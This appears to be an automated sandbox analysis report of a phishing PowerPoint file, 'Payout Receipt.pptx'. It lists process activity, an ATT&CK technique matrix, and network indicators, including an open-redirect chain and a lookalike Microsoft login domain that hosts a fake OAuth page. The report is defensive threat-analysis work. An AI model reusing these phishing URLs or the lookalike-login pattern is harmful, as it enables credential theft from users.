            Source: rule702050v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule360001v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702051v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule370000v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702100v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule370001v2.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702101v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule370002v2.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702150v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule370005v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702151v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule370006v0.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule370007v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702200v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702201v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule370009v0.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702250v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule370011v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702251v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule370012v0.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702300v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule390004v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702301v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule390005v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702350v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule440000v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702351v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule460008v0.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702400v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule460009v0.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702401v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule490002v13.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule490003v7.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702450v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702451v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule490004v7.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702500v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule490005v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702501v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule150246v2.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule490009v5.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702550v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule150249v0.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule490010v7.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702551v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule150259v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule490011v4.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702600v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule150262v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule490014v2.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702601v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule170000v6.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule490015v2.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702650v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule170002v6.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule490015v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702651v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule170003v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule490015v4.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule170005v2.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule490015v5.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule170007v5.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule170009v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702700v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702701v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule490016v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702750v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule490018v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702751v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule170011v2.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule490020v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: classification engineClassification label: mal76.phis.winPPTX@20/1149@30/13
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\PowerPointJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEFile created: C:\Users\user\AppData\Local\Temp\{E910548C-1979-4833-9FEE-78F97BEE9BF6} - OProcSessId.datJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\Payout Receipt.pptx" /ou ""
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "4F1F87A3-2D62-4CDB-ABDF-61BB45105DB2" "40BB7578-B581-41D4-B322-FEC0ED1808AE" "6380" "C:\Program Files (x86)\Microsoft Office\Root\Office16\POWERPNT.EXE" "PowerPointCombinedFloatieLreOnline.onnx"
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://nomicscare.com/fr/gdpr/cookie-consent/all/?next_url=//crewbloom.s3.amazonaws.com/34873.html
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1944,i,8800721303449338163,5848358366860922411,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "4F1F87A3-2D62-4CDB-ABDF-61BB45105DB2" "40BB7578-B581-41D4-B322-FEC0ED1808AE" "6380" "C:\Program Files (x86)\Microsoft Office\Root\Office16\POWERPNT.EXE" "PowerPointCombinedFloatieLreOnline.onnx"Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1944,i,8800721303449338163,5848358366860922411,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEProcess information queried: ProcessInformationJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\PowerPointCombinedFloatieLreOnline.onnx VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid AccountsWindows Management Instrumentation1
            Scripting
            1
            Process Injection
            1
            Masquerading
            OS Credential Dumping1
            Process Discovery
            Remote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Process Injection
            LSASS Memory1
            File and Directory Discovery
            Remote Desktop ProtocolData from Removable Media4
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            Registry Run Keys / Startup Folder
            1
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            Security Account Manager12
            System Information Discovery
            SMB/Windows Admin SharesData from Network Shared Drive5
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Extra Window Memory Injection
            1
            Extra Window Memory Injection
            NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
            Ingress Tool Transfer
            Traffic DuplicationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Payout Receipt.pptx0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://crewbloom.s3.amazonaws.com/34873.html100%SlashNextCredential Stealing type: Phishing & Social Engineering
            NameIPActiveMaliciousAntivirus DetectionReputation
            s3-w.us-east-1.amazonaws.com
            3.5.1.122
            truefalse
              unknown
              nomicscare.com
              51.255.64.170
              truefalse
                unknown
                a.nel.cloudflare.com
                35.190.80.1
                truefalse
                  unknown
                  dualstack.twimg.twitter.map.fastly.net
                  146.75.52.159
                  truefalse
                    unknown
                    l0gin-microso.ftlivedocs.tech
                    104.26.12.69
                    truetrue
                      unknown
                      challenges.cloudflare.com
                      104.18.95.41
                      truefalse
                        unknown
                        s-part-0017.t-0009.t-msedge.net
                        13.107.246.45
                        truefalse
                          unknown
                          sni1gl.wpc.omegacdn.net
                          152.199.21.175
                          truefalse
                            unknown
                            www.google.com
                            142.250.185.68
                            truefalse
                              unknown
                              www.ftlivedocs.tech
                              172.67.71.124
                              truefalse
                                unknown
                                s-part-0032.t-0009.t-msedge.net
                                13.107.246.60
                                truefalse
                                  unknown
                                  ywnjb.ftlivedocs.tech
                                  172.67.71.124
                                  truefalse
                                    unknown
                                    crewbloom.s3.amazonaws.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      identity.nel.measure.office.net
                                      unknown
                                      unknownfalse
                                        unknown
                                        pbs.twimg.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          aadcdn.msftauth.net
                                          unknown
                                          unknownfalse
                                            unknown
                                            NameMaliciousAntivirus DetectionReputation
                                            https://l0gin-microso.ftlivedocs.tech/favicon.icofalse
                                              unknown
                                              https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.jsfalse
                                                unknown
                                                https://ywnjb.ftlivedocs.tech/Me.htm?v=3false
                                                  unknown
                                                  https://l0gin-microso.ftlivedocs.tech/cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js?false
                                                    unknown
                                                    https://l0gin-microso.ftlivedocs.tech/cdn-cgi/challenge-platform/scripts/jsd/main.jsfalse
                                                      unknown
                                                      https://l0gin-microso.ftlivedocs.tech/KUtIdFka?S=UmxuHlotrue
                                                        unknown
                                                        https://l0gin-microso.ftlivedocs.tech/KUtIdFkatrue
                                                          unknown
                                                          https://www.ftlivedocs.tech/loginfalse
                                                            unknown
                                                            https://l0gin-microso.ftlivedocs.tech/cdn-cgi/challenge-platform/h/g/jsd/r/8cd56a496a3b5e6afalse
                                                              unknown
                                                              https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                                                unknown
                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cd56a630cf741e3/1728047464607/YBBtqSrR-kb7LqJfalse
                                                                  unknown
                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8cd56a630cf741e3/1728047464610/6315a5703f342bce662661e8fa8e5cfbec36c51d90ea70cfa211f89c976d3430/n-8rMprBONH9scUfalse
                                                                    unknown
                                                                    https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0true
                                                                      unknown
                                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/bth64/0x4AAAAAAAwd9hw5rvoDjM7I/auto/fbE/normal/auto/false
                                                                        unknown
